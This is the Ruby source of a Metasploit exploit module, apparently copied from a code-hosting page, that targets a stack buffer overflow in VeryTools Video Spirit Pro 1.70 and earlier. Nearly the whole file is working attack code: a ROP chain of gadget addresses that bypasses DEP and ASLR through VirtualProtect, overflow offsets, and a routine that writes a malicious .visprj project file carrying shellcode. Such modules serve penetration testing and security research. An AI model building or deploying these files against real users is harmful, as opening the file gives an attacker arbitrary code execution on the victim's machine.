241 lines
6.5 KiB
Ruby
241 lines
6.5 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = GoodRanking
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'VeryTools Video Spirit Pro',
|
|
'Description' => %q{
|
|
This module exploits a stack buffer overflow in Video Spirit <= 1.70.
|
|
When opening a malicious project file (.visprj), a stack buffer overflow occurs,
|
|
resulting in arbitrary code execution.
|
|
This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Acidgen', #found the vulnerability
|
|
'corelanc0d3r <peter.ve[at]corelan.be>', #rop exploit + msf module
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2011-0499'],
|
|
[ 'CVE', '2011-0500'],
|
|
[ 'OSVDB', '70619'],
|
|
[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-001' ],
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'process',
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 800, #0x320 bytes - avoid marking wrong page as RWX
|
|
'BadChars' => "\x00\x0a\x0b\x0c\x0d\x0e\x0f\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x26\x27\x2f\x3c\x3e",
|
|
'DisableNops' => 'True',
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
[ 'Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass',
|
|
{
|
|
'OffSet' => 168,
|
|
'OffSetToRop' => 952,
|
|
'Ret' => 0x1006CC10, #overlayplug.dll stackpivot bad char friendly
|
|
}
|
|
],
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => 'Apr 11 2011',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('FILENAME', [ true, 'VideoSpirit project name.', 'msf.visprj']),
|
|
])
|
|
end
|
|
|
|
def junk
|
|
return rand_text_alphanumeric(4).unpack("L")[0].to_i
|
|
end
|
|
|
|
def exploit
|
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
|
|
|
header = %Q|
|
|
<version value="1" />
|
|
<track>
|
|
<type value="0" />
|
|
<type value="4" />
|
|
<type value="2" />
|
|
<type value="1" />
|
|
<type value="7" />
|
|
</track>
|
|
<track0 />
|
|
<track1 />
|
|
<track2 />
|
|
<track3 />
|
|
<track4 />
|
|
<clip />
|
|
<output typename="AVI" keepaspect="0" presetquality="0">
|
|
<type0 enable="1">
|
|
|
|
|
|
|
footer = %Q|
|
|
<valitem name="320*240(4:3)" value="320*240" />
|
|
<valitem name="30" value="30" />
|
|
<valitem name="16000k" value="16000k" />
|
|
</type0>
|
|
<type1 enable="1">
|
|
<valitem name="mp3" value="libmp3lame" />
|
|
<valitem name="128k" value="128k" />
|
|
<valitem name="44100" value="44100" />
|
|
<valitem name="2 (Stereo)" value="2" />
|
|
</type1>
|
|
<type2 enable="0" />
|
|
</output>
|
|
|
|
|
print_status("Preparing payload")
|
|
|
|
pivot = [target.ret].pack('V')
|
|
|
|
rop_gadgets =
|
|
[
|
|
# one non-ASLR module is enough for generic ASLR & DEP bypass !
|
|
# pvefindaddr rop 'n roll
|
|
# First, grab VirtualProtect ptr
|
|
0x10065292, # POP EAX # RETN [OverlayPlug.dll]
|
|
0x106F4244, # IAT entry + offsqet (bad char friendly)
|
|
0x10019762, # POP EBP # RETN [OverlayPlug.dll]
|
|
0xEFEFEFF0, # bye bye offset
|
|
0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]
|
|
0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [OverlayPlug.dll]
|
|
junk,
|
|
junk,
|
|
junk,
|
|
0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [OverlayPlug.dll]
|
|
0x10016A56, # XCHG EAX,ESI [OverlayPlug.dll]
|
|
|
|
# set size
|
|
0x100A9274, # POP EAX # RETN [OverlayPlug.dll]
|
|
0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :)
|
|
0x10019762, # POP EBP # RETN [OverlayPlug.dll]
|
|
0xEFEFEFF0, # boo
|
|
0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]
|
|
0x10053E4C, # XCHG EAX,EBP # RETN [OverlayPlug.dll]
|
|
0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [OverlayPlug.dll]
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
|
|
# set NewProtect to 0x40
|
|
0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [OverlayPlug.dll]
|
|
junk,
|
|
junk,
|
|
junk,
|
|
junk,
|
|
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
|
junk,
|
|
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
|
junk,
|
|
junk,
|
|
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
|
junk,
|
|
junk,
|
|
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
|
junk,
|
|
junk,
|
|
0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [OverlayPlug.dll]
|
|
junk,
|
|
|
|
# write pOldProtect to .data section
|
|
0x1001AB51, # POP ECX # RETN [OverlayPlug.dll]
|
|
junk,
|
|
0x10117030, # RW
|
|
|
|
# EDI : ROP NOP
|
|
0x10057090, # POP EDI # RETN [OverlayPlug.dll]
|
|
0x10057091, # ROP NOP
|
|
|
|
# pReturn2Payload
|
|
0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [OverlayPlug.dll]
|
|
0x10016A56, # XCHG EAX,ESI # RETN [OverlayPlug.dll]
|
|
0x1003C946, # ADD EAX,0A # RETN [OverlayPlug.dll]
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1003C946,
|
|
0x1001FDBD, # XCHG EAX,EBP # RETN [OverlayPlug.dll]
|
|
|
|
0x100A9274, # POP EAX # RETN [OverlayPlug.dll]
|
|
0x41414141,
|
|
|
|
# go
|
|
0x10066F84, # PUSHAD # RETN [OverlayPlug.dll]
|
|
].pack("V*")
|
|
|
|
|
|
buffer = "<valitem name="
|
|
buffer << '"'
|
|
buffer << rand_text_alphanumeric((target['OffSet']))
|
|
buffer << rand_text_alphanumeric(4) #nseh
|
|
buffer << pivot
|
|
buffer << rand_text_alphanumeric((target['OffSetToRop']))
|
|
buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7
|
|
buffer << rop_gadgets
|
|
buffer << make_nops(150)
|
|
buffer << payload.encoded
|
|
buffer << rand_text_alphanumeric(4000)
|
|
buffer << '"'
|
|
buffer << ' value="msmpeg4v2"'
|
|
buffer << "/>"
|
|
buffer << "\n"
|
|
|
|
filecontent = header + buffer + footer
|
|
|
|
print_status("Writing payload to file")
|
|
|
|
file_create(filecontent)
|
|
|
|
end
|
|
end
|